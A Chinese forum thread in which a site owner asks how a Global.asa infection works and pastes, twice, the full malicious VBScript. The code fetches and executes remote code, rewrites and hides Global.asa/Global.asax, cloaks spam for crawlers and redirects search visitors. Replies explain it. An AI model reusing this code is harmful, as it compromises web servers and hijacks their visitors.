52,797
社区成员
发帖
与我相关
我的任务
分享关于这个Global.asa病毒的原理到底是什么?
(1)百度收录网站时,为什么收录的网址自动有查询字符串:gjs.hnnu.cn/?key=cqmf
(2)为什么从百度点击进入时,可同时打开病毒设置的网页。
代码如下:Global.asa
<script language="vbscript" runat="server">
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
On Error Resume Next
url="http://www.520rtys.info/520rtys/global.asaquan.gif"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by*vb")>0 then
execute GetHtml
end if
end sub
</script>
调用的http://www.520rtys.info/520rtys/global.asaquan.gif文件内容:
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/Global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/Global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/Global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/Global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
asa=GetHtml("http://www.520rtys.info/520rtys/globalquan.gif")
if instr(asa,"by*vb")>0 then
createasa(asa)
end if
asax=GetHtml("http://www.520rtys.info/520rtys/globalquanasax.gif")
if instr(asax,"by*vb")>0 then
createasax(asax)
end if
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.520rtys.info/?"&cnnbd&"")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://3.gench.info/")
response.write body
Dim XmlHttp
Set XmlHttp = Server.CreateObject("MSXML2.ServerXMLHTTP")
XmlHttp.open "GET","http://www.520rtys.info/520rtys/seo.htm",false
XmlHttp.send()
response.write(XmlHttp.responseText)
response.end
else
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok"
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if tjcount="" then
response.cookies("cookie_tjcount")=0
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
end if
if date1<>date2 then
response.cookies("cookie_date")=date2
response.cookies("cookie_date").Expires=DateAdd("d",365,now())
end if
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if date1=date2 and len(bot) = 0 then
if int(tjcount)<10 and len(Amll)>0 then
response.cookies("cookie_tjcount")=int(tjcount)+1
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
strHost=Request.ServerVariables("HTTP_HOST")
Response.Redirect("http://www.369m.info/?domain="&strHost&"")
else
response.write "系统找不到指定的文件。"
'response.write ""
'response.write gethtml(geturl&"?global=ok")
end if
response.end
end if
Call sleep()
end if
end if
'</body></html>
(2)为什么从百度点击进入时,可同时打开病毒设置的网页。
代码如下:Global.asa
<script language="vbscript" runat="server">
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
On Error Resume Next
url="http://www.520rtys.info/520rtys/global.asaquan.gif"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by*vb")>0 then
execute GetHtml
end if
end sub
</script>
调用的http://www.520rtys.info/520rtys/global.asaquan.gif文件内容:
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/Global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/Global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/Global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/Global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
asa=GetHtml("http://www.520rtys.info/520rtys/globalquan.gif")
if instr(asa,"by*vb")>0 then
createasa(asa)
end if
asax=GetHtml("http://www.520rtys.info/520rtys/globalquanasax.gif")
if instr(asax,"by*vb")>0 then
createasax(asax)
end if
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.520rtys.info/?"&cnnbd&"")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://3.gench.info/")
response.write body
Dim XmlHttp
Set XmlHttp = Server.CreateObject("MSXML2.ServerXMLHTTP")
XmlHttp.open "GET","http://www.520rtys.info/520rtys/seo.htm",false
XmlHttp.send()
response.write(XmlHttp.responseText)
response.end
else
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok"
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if tjcount="" then
response.cookies("cookie_tjcount")=0
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
end if
if date1<>date2 then
response.cookies("cookie_date")=date2
response.cookies("cookie_date").Expires=DateAdd("d",365,now())
end if
tjcount=request.Cookies("cookie_tjcount")
date1=request.Cookies("cookie_date")
date2=year(date)&month(date)&day(date)
if date1=date2 and len(bot) = 0 then
if int(tjcount)<10 and len(Amll)>0 then
response.cookies("cookie_tjcount")=int(tjcount)+1
response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now())
strHost=Request.ServerVariables("HTTP_HOST")
Response.Redirect("http://www.369m.info/?domain="&strHost&"")
else
response.write "系统找不到指定的文件。"
'response.write ""
'response.write gethtml(geturl&"?global=ok")
end if
response.end
end if
Call sleep()
end if
end if
'</body></html>
...全文
请发表友善的回复…
发表回复
hookee 2012-06-24
- 打赏
- 举报
通过http头的 user-agent可以知道是不是搜索引擎过来的请求;
搜索引擎过来的请求会带查询参数,通过http头http-reffer可以获得这个参数;
用response.redirect 转到 他的地址;
以上都是由 session_start触发的
-------
程序在 global.asaquan.gif中,通过XMLHTTP获取后 用Stream文本方式读取它,然后用vbs的execute执行其中的代码;
-------
不管如何,网站中应该是有上传漏洞,改写了global.asa文件了
搜索引擎过来的请求会带查询参数,通过http头http-reffer可以获得这个参数;
用response.redirect 转到 他的地址;
以上都是由 session_start触发的
-------
程序在 global.asaquan.gif中,通过XMLHTTP获取后 用Stream文本方式读取它,然后用vbs的execute执行其中的代码;
-------
不管如何,网站中应该是有上传漏洞,改写了global.asa文件了
wuxia2118 2012-06-24
- 打赏
- 举报
而且这个代码能劫持Session,导致后台登陆不进,提示Session超时,我怀疑是病毒创建的Session覆盖了登录的Session
